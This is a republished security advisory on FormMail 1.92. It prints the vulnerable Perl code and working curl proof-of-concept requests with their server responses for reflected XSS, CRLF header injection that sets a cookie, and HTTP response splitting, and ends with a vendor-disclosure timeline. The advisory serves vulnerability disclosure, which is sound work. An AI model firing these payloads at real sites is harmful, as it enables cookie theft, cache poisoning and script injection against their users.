|
Brought to you by:
Suppliers of:
|
|
|
| |
| Multiple vulnerabilities exist in FormMail software cross site scripting, HTTP response header injection and HTTP response splitting. |
| |
Credit:
The information has been provided by Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata.
The original article can be found at: http://www.ush.it/team/ush/hack-formmail_192/adv.txt
|
| |
Vulnerable Systems:
* FormMail version 1.92
A) Prelude to the vulnerabities
What follows is the code used to validate the user input:
Line 283: $safeConfig array definition.
foreach $field (keys %Config) {
$safeConfig{$field} = &clean_html($Config{$field});
}
Line 518: definition of clean_html function, used to generate the "$safeConfig" array from "$Config".
# This function will convert <, >, & and " to their HTML equivalents. sub clean_html {
local $value = $_[0];
$value =~ s/\&/\&/g;
$value =~ s/</\</g;
$value =~ s/>/\>/g;
$value =~ s/"/\"/g; return $value;
}
These functions are not always applied to the user input and don't protect against all the attack vectors (as URI or DOM XSS that can work also if encoded), this is why various vulnerabilities exist.
B) Cross Site Scripting vulnerability
Line 293: the "redirect" variable is used to write the location header value. Its value is not filtered so it's possible to perform both HTTP Header Injection and an HTTP Response Splitting attacks.
Since Header Injection is one of the most versatile attack vectors we could use it (like "downgrade it") to perform a Cross Site Scripting attack but it would not represent a different vulnerability.
In this case we are already inside a "Location" response header and it's possible to perform an XSS without splitting the response and using the standard Apache page for the 302 Found HTTP status.
# If redirect option is used, print the redirectional location header. if ($Config{'redirect'}) {print "Location: $safeConfig{'redirect'}\n\n";
}
XSS vulnerability example:
http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);
Response:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);"
HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="javascript:alert('USH');">here</a>.</p>
<hr>
<address>Apache Server at 127.0.0.1 Port 80</address>
</body></html>
Obiously the XSS is not automatic since browsers don't follow the "javascript:" URI handler in the "Location" header.
A second XSS vulnerability, not based on HTTP tricks, exists: in the following code the the "$return_link" variable is reflected (printed) in the page body without any validation:
Line 371: the "$return_link" variable is printed in the page body without any validation.
# Check for a Return Link and print one if found. #
if ($Config{'return_link_url'} && $Config{'return_link_title'}) {
print "<ul>\n";
print "<li><a href=\"$safeConfig{'return_link_url'}\">$safeConfig{'return_link_title'}</a>\n";
print "</ul>\n";
}
The vulnerability can be triggered with the following request:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH"
This XSS is not automatic.
C) HTTP Response Header Injection
An HTTP Response Header Injection vulnerability exists, the following request triggers the vulnerability:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3 DHTTPHeaderInjection;"
Can be verified with the obvious "javascript:alert(document.cookie)".
D) HTTP Response Splitting
Thanks to the full exploitability of the Header Injection vulnerability an HTTP Response Splitting can be performed.
The following request is an example of the attack:
http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.ush.it%0D%0A%0FContent-Length:
%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A
Content-Type:%20text/plain%0D%0Ahttp://www.ush.it
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0A
Content-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20
text/plain%0D%0Ahttp://www.ush.it"
HTTP/1.1 302 Found
Date: Sun, 12 Apr 2009 23:01:18 GMT
Server: Apache
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain
HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it
HTTP Response Splitting can be used to trigger a number of different vectors, ranging from automatic Reflected XSS to Browser and Proxy Cache Poisoning.
Disclosure Timeline:
20070501 Bug discovered
20070531 Initial vendor contact -- No response
20090505 Second vendor contact -- No response
20090511 Advisory Release
|
|
|
|
|
